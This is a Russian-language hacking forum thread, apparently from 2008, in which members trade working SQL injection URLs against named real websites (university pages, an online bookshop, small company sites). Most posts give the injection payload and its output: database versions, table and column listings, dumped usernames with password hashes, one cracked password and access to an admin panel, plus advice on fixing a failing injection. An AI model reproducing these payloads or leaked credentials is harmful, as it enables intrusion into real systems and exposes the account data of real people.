08.07.2008, 14:11
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
ничего толкового выжать не удалось..мож кто наколупает что..))
EDU
http://inquiry.uiuc.edu/cil2/syllabus_printer_friendly.php?syllabus_id=39+union +select+concat_ws(char(58),user(),version(),databa se())/*
cillookup@gserve085.lis.uiuc.edu:5.0.15:cilbuilder
next..
http://www.ans.iastate.edu/events/calendar_print.php?month=9&year=2007&room=1+order+ by+4/*
PHP код:
aswipe_user
NetID:Password pluthe:2a8de84d9bba07bd167538242df1a3c6 plspike:01e1a02dc87a642ef3b6d00cbee39e91 dlnelson:a1f1d2a50abcb2421fee7d509810e153 sebranek:69e332ddfc7042b084a6367ad89b0259 jdickson:9f88e2f040d048435afc7c91ead6c257 hkepler:cb16f5d9fecbae34d999a17652305de1 amkrull:1c06f99ef5c5fcaa140cfb1a363b670d ashuey:0c1e3901334db2be084c9a20ed7dcce2 trina:c89f9f4ef264e22001f9a9c3d72992ef jrober:c69606c5207571c525520256ada5250d jaiton:dfd8f130b46332c4ff46c8316ad2465d
pluthe:2a8de84d9bba07bd167538242df1a3c6:fricfrac
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://news.lib.vt.edu/libnews/modules.php?name=News&file=print&sid=2+union+selec t+user,2,password,4,5,6+from+mysql.user+limit+0,10/*
staff:4A8210F69BBF5F82B9392F9305960AC5229829B3: root:8093D3180B1D12DFF9E3618B4C6770CB5C6BA312:
Последний раз редактировалось $n@ke; 08.07.2008 в 16:26..
Причина: add..again)
|
|
|
09.07.2008, 04:06
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 100
Провел на форуме:
226029
Репутация:
3
|
|
Интернет магазин
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+table_name +from+information_schema.tables+limit+20,1/*
НО... Не могу понять почему не работает ничего при запросе
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( username,password)+from+users/*
|
|
|
|
09.07.2008, 06:10
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
_http://www.a-training.ru/news/new.php?id=15+union+select+1,2,3/*
version() - 4.0.27-log
database() - a-training
user() - a-training@localhost
_http://www.latfutsal.lv/new.php?id=-489+union+select+1,2,3,4,5,6,7,8/*
version() - 4.0.27-l
database() - new
user() - new@loca
_http://www.bukovina.biz.ua/new.php?id=-14+union+select+1,2,3,4,5/*
_http://www.creacon.ru/new.php?id=-245+union+select+1,2,3,4,5/*
_http://www.adams-motors.ru/new.php?id=-2+union+select+1,2,3/*
version() - 5.0.32-Debian_7etch5-log
database() - adamsold
user() - adamsold@localhost
_http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,2%20FROM%20INFORMATION _SCHEMA.TABLES%20/*
имена таблиц :
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
phpbb_auth_access
phpbb_banlist
phpbb_categories и т.д.
|
|
|
|
09.07.2008, 06:21
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Academicjournals.net
http://www.academicjournals.net/2/archive.php?id=999999+union+select+1,2,3,4,5,6,7,8 ,9,10,11/*&theme=2&jid=ijv
жаль.. негмогу получить вывод (
http://www.academicjournals.net/2/archive.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables/*&theme=2&jid=ijv
зато ясно что эт 4 версия. поетому и забил (
http://www.palmetto-records.net/artist.php?id=1'
тут поидее чтото странное.... union и select не опознаны)))
http://www.the213.net/php/article.php?id=99999+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20/*
хмм.. 20 перебрал и хз.......
http://www.torrentreactor.net/browse.php?id=3.inc.php)+union+select+1/*
не уверен что эт иньекция..
Lexeon
http://books.dovidka.com.ua/index.php?cat=999999999+union+select+password+from +test.users/*
вот правильная база..... но это сиравно тест.
database books
dir
1 : parent
2 : title
3 : image
4 : type
5 : author
6 : format
7 : pages
8 : palitura
9 : mova
10 : pereklad
11 : anot
12 : auditor
13 : image1
14 : sortir
15 : price
16 : pdf
17 : pdf1
18 : znyzhka
19 : sold
20 : weight
21 : xdate
22 : zamov1
23 : zamov2
order_cont
1 : item
2 : quan
3 : price
orders
1 : zamov
2 : tel
3 : addr
4 : xdate
5 : pindex
6 : organ
7 : pos
8 : email
9 : otrym
10 : opr
11 : zamov2
12 : zamov1
parms
1 : price_margin
2 : price_lower
3 : price_upper
4 : t1
5 : t2
6 : t3
7 : t4
8 : t5
9 : code1
10 : code2
11 : code3
database test
users
1 : password
Последний раз редактировалось sabe; 09.07.2008 в 06:53..
|
|
|
|
09.07.2008, 07:38
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
не работает потому что таблица находится в другой базе..
так определяем название базы и название таблицы...
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( 0x2e,table_schema,table_name)+from+information_sch ema.tables+limit+20,1/*
ну а вот собственно и сам выбор из таблицы.. и заметь, что все работает и выводит
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( 0x3a3a,username,password)+from+test.users/*
Последний раз редактировалось gisTy; 09.07.2008 в 08:02..
|
|
|
|
09.07.2008, 15:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
ух что я нашел...
Код:
http://www.snipersister.de/wap/wapmain.php?option=onewsaction=linkid=-1+union+select+1,2,3,convert(aes_decrypt(aes_encrypt(concat(email,0x3a,username,0x3a,password),0x71),0x71),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
вывод в цикле всегда радовало это  |
|
|
|
09.07.2008, 15:10
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
в антибояне нет
www.u10.ru
Уязвимость в:
Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')
Колонки:
http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
Информация о базе:
Версия: 4.1.21-standard
Пользователь: u10_u10@localhost
|
|
|
|
09.07.2008, 15:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Сообщение от $p01nt
www.u10.ru
Уязвимость в:
Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')
Колонки:
http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
Информация о базе:
Версия: 4.1.21-standard
Пользователь: u10_u10@localhost
А че недокопать-то....
Код:
http://u10.ru/index.php?menu=category&id=-3+union+select+1,convert(concat_ws(0x3a,name,pass),binary)+from+admin--
|
|
|
|
09.07.2008, 15:21
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Сообщение от $p01nt
www.u10.ru
Уязвимость в:
Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')
Колонки:
http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
Информация о базе:
Версия: 4.1.21-standard
Пользователь: u10_u10@localhost
_http://u10.ru/index.php?menu=category&id=-3+union+select+1,concat(name,char(58),pass)+from+a dmin+limit+0,1/*
http://u10.ru/admin/admin.php
|
|
|
|
09.07.2008, 15:21
|
|
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
он весь дырявый.
Добро пожаловать в панель администрирования
сайтом http://u10.ru/
Сайт разработки бажный..
Последний раз редактировалось Rebz; 09.07.2008 в 15:26..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
